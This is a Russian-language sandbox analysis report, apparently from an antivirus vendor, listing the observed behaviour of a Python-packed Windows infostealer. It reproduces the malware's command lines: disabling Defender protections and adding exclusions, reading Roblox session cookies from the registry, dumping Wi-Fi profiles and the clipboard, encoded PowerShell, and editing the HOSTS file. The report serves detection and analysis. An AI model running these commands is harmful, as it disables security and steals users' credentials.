Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '<Полный путь к файлу>'
Запускает на исполнение
- '<SYSTEM32>\taskkill.exe' /F /PID 3924
- '<SYSTEM32>\taskkill.exe' /F /PID 4028
- '<SYSTEM32>\taskkill.exe' /F /PID 4060
- '<SYSTEM32>\taskkill.exe' /F /PID 4056
Читает файлы, отвечающие за хранение паролей сторонними программами
- %HOMEPATH%\desktop\508softwareandos.doc
- %HOMEPATH%\desktop\applicantform_en.doc
- %HOMEPATH%\desktop\file_p_00000000_1371597592.docx
- %HOMEPATH%\desktop\hadac_newsletter_july_2010_final.docx
- %HOMEPATH%\desktop\hanni_umami_chapter.doc
- %HOMEPATH%\desktop\holycrosschurchinstructions.docx
- %HOMEPATH%\desktop\issi2013_template_for_posters.docx
- %HOMEPATH%\desktop\uep_form_786_bulletin_1726i602.doc
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\_mei44962\vcruntime140.dll
- %TEMP%\blj3fgzy\blj3fgzy.0.cs
- %TEMP%\ \system\antivirus.txt
- %TEMP%\ \common files\desktop\uep_form_786_bulletin_1726i602.doc
- %TEMP%\ \common files\desktop\issi2013_template_for_posters.docx
- %TEMP%\ \common files\desktop\holycrosschurchinstructions.docx
- %TEMP%\ \common files\desktop\hanni_umami_chapter.doc
- %TEMP%\ \common files\desktop\hadac_newsletter_july_2010_final.docx
- %TEMP%\ \common files\desktop\file_p_00000000_1371597592.docx
- %TEMP%\ \common files\desktop\applicantform_en.doc
- %TEMP%\ \common files\desktop\508softwareandos.doc
- %TEMP%\_mei44962\rarreg.key
- %TEMP%\_mei44962\blank.aes
- %TEMP%\_mei44962\base_library.zip
- %TEMP%\_mei44962\unicodedata.pyd
- %TEMP%\blj3fgzy\blj3fgzy.cmdline
- %TEMP%\_mei44962\sqlite3.dll
- %TEMP%\_mei44962\rar.exe
- %TEMP%\_mei44962\python311.dll
- %TEMP%\_mei44962\libssl-1_1.dll
- %TEMP%\_mei44962\libffi-8.dll
- %TEMP%\_mei44962\libcrypto-1_1.dll
- %TEMP%\_mei44962\_ssl.pyd
- %TEMP%\_mei44962\_sqlite3.pyd
- %TEMP%\_mei44962\_socket.pyd
- %TEMP%\_mei44962\_queue.pyd
- %TEMP%\_mei44962\_lzma.pyd
- %TEMP%\_mei44962\_hashlib.pyd
- %TEMP%\_mei44962\_decimal.pyd
- %TEMP%\_mei44962\_ctypes.pyd
- %TEMP%\_mei44962\_bz2.pyd
- %TEMP%\_mei44962\select.pyd
- %TEMP%\blj3fgzy\blj3fgzy.out
Изменяет файл HOSTS.
Сетевая активность
Подключается к
- 'gs##tic.com':443
TCP
Другие
- 'gs##tic.com':443
UDP
- DNS ASK gs##tic.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '<Полный путь к файлу>'"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 4056"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 4060"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 4028"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 3924"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "getmac"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES92FF.tmp" "%TEMP%\blj3fgzy\CSCF5159996C3474B13B238F76F86F84B.TMP"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\blj3fgzy\blj3fgzy.cmdline"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "attrib +r <DRIVERS>\etc\hosts"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "attrib -r <DRIVERS>\etc\hosts"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbAB...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "systeminfo"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "tree /A /F"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "netsh wlan show profile"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell Get-Clipboard"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "wmic path win32_shortcutfile where name="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Steam\\Steam.lnk" get target /value"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "wmic path win32_shortcutfile where name="C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Telegram Desktop\\Telegram.lnk" get target /value"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "tasklist /FO LIST"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess ...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 424"' (со скрытым окном)
Перезапускает анализируемый образец
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '<Полный путь к файлу>'"
- '<SYSTEM32>\cmd.exe' /c "attrib -r <DRIVERS>\etc\hosts"
- '<SYSTEM32>\attrib.exe' -r <DRIVERS>\etc\hosts
- '<SYSTEM32>\cmd.exe' /c "attrib +r <DRIVERS>\etc\hosts"
- '<SYSTEM32>\attrib.exe' +r <DRIVERS>\etc\hosts
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\blj3fgzy\blj3fgzy.cmdline"
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES92FF.tmp" "%TEMP%\blj3fgzy\CSCF5159996C3474B13B238F76F86F84B.TMP"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC...
- '<SYSTEM32>\reg.exe' QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
- '<SYSTEM32>\cmd.exe' /c "getmac"
- '<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 4028"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 4060"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 4056"
- '<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
- '<SYSTEM32>\getmac.exe'
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 3924"
- '<SYSTEM32>\tree.com' /A /F
- '<SYSTEM32>\systeminfo.exe'
- '<SYSTEM32>\netsh.exe' wlan show profile
- '<SYSTEM32>\cmd.exe' /c "tasklist /FO LIST"
- '<SYSTEM32>\cmd.exe' /c "wmic path win32_shortcutfile where name="C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Telegram Desktop\\Telegram.lnk" get target /value"
- '<SYSTEM32>\cmd.exe' /c "wmic path win32_shortcutfile where name="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Steam\\Steam.lnk" get target /value"
- '<SYSTEM32>\cmd.exe' /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
- '<SYSTEM32>\cmd.exe' /c "powershell Get-Clipboard"
- '<SYSTEM32>\cmd.exe' /c "netsh wlan show profile"
- '<SYSTEM32>\cmd.exe' /c "tree /A /F"
- '<SYSTEM32>\cmd.exe' /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess ...
- '<SYSTEM32>\cmd.exe' /c "systeminfo"
- '<SYSTEM32>\cmd.exe' /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbAB...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -Enabl...
- '<SYSTEM32>\tasklist.exe' /FO LIST
- '<SYSTEM32>\wbem\wmic.exe' path win32_shortcutfile where name="C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Telegram Desktop\\Telegram.lnk" get target /value
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-Clipboard
- '<SYSTEM32>\wbem\wmic.exe' path win32_shortcutfile where name="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Steam\\Steam.lnk" get target /value
- '<SYSTEM32>\wbem\wmic.exe' /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
- '<SYSTEM32>\cmd.exe' /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 424"
